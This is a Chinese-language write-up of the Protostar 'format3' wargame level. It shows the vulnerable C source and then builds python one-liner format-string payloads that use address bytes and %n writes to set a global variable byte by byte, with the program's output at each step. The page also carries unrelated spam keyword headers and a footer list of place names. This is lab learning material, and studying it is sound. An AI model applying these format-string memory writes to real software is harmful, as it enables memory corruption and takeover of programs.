91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Protostar format3

發布時間:2020-07-10 20:45:24 來源:網絡 閱讀:815 作者:terrying 欄目:安全技術

About

This level advances from format2 and shows how to write more than 1 or 2 bytes of memory to the process. This also teaches you to carefully control what data is being written to the process memory.
This level is at /opt/protostar/bin/format3

Source code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void printbuffer(char *string)
{
                printf(string);
}

void vuln()
{
                char buffer[512];
                fgets(buffer, sizeof(buffer), stdin);
                printbuffer(buffer);

                if(target == 0x01025544) {
                                printf("you have modified the target :)\n");
                } else {
                                printf("target is %08x :(\n", target);
                }
}

int main(int argc, char **argv)
{
                vuln();
}

這題與上看上去是不是很像?具體看看有兩個不同的地方:1、是printbuffer替換了printf;2、是target的值換為0x01025544

同理,按上一題的做法試試,修改%x的長度,結果是可以的,結果字符串太長,等到我都睡著了。。。
user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08%232x%232x%3333x%x%x%x%x%x%x%x%16926279x%n"' | ./format3
<...>
                                                                                                                                                                                                                 bffff614
you have modified the target :)

很明顯,這樣的做法不是題目的本意。由于本人掌握知識有限,即使答案擺在眼前也搞不明白。。。直到,看了本書《***之道:漏洞發掘的藝術》才恍然大悟,如果有人看不懂解答的話也強烈推薦看看這本書!!

以下說明均以閱讀過《***之道:漏洞發掘的藝術》相關章節為基礎,至于原理性不做太多解釋,有空再專門寫一篇文章解釋解釋 。。。

這題的難點也就是通過%n來修改target的值,從上一題的解法可以掌握的是可以通過%nx來掌握不算大的長度,因此對0x01025544通過拆分來完成,具體做法如下:
user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08"+"%x."*12' | ./format3
     0.bffff5e0.b7fd7ff4.0.0.bffff7e8.804849d.bffff5e0.200.b7fd8420.bffff624.80496f4.
target is 00000000 :(
user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08"+"%11$x%12$n"' | ./format3
     bffff624
target is 00000014 :(
user@protostar:/opt/protostar/bin$ python -c 'print 0x44-(0x14-0x8)'
56
user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08"+"%11$56x%12$n"' | ./format3
                                                                                                     bffff624
target is 00000044 :(

瞧,現在已經得到低字節已經是44了,接下來按同一個思路往下做就是了。

user@protostar:/opt/protostar/bin$ python -c 'print 0x55-0x44'
17
user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08"+"%11$56x%12$n"+"%12$17x%13$n"' | ./format3
                                                                                                     bffff624                    80496f4
target is 00005544 :(
user@protostar:/opt/protostar/bin$ python -c 'print 0x102-0x55'
173
user@protostar:/opt/protostar/bin$ python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08"+"%11$56x%12$n"+"%12$17x%13$n"+"%13$173x%14$n"' | ./format3
                                                                                                     bffff624                    80496f4                                                                                                                                                                                                                                                                                                                                            80496f5
you have modified the target :)


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

巴南区| 旌德县| 怀宁县| 新巴尔虎左旗| 马龙县| 新和县| 桂林市| 周至县| 连南| 靖边县| 建德市| 长治市| 镇雄县| 天等县| 沛县| 湘西| 宝应县| 庆阳市| 右玉县| 南部县| 体育| 江津市| 图木舒克市| 清镇市| 延安市| 吴江市| 乐陵市| 长岛县| 夹江县| 泸西县| 凤凰县| 文登市| 汝阳县| 溧阳市| 晋城| 石景山区| 左权县| 尼木县| 神农架林区| 伊川县| 泽州县|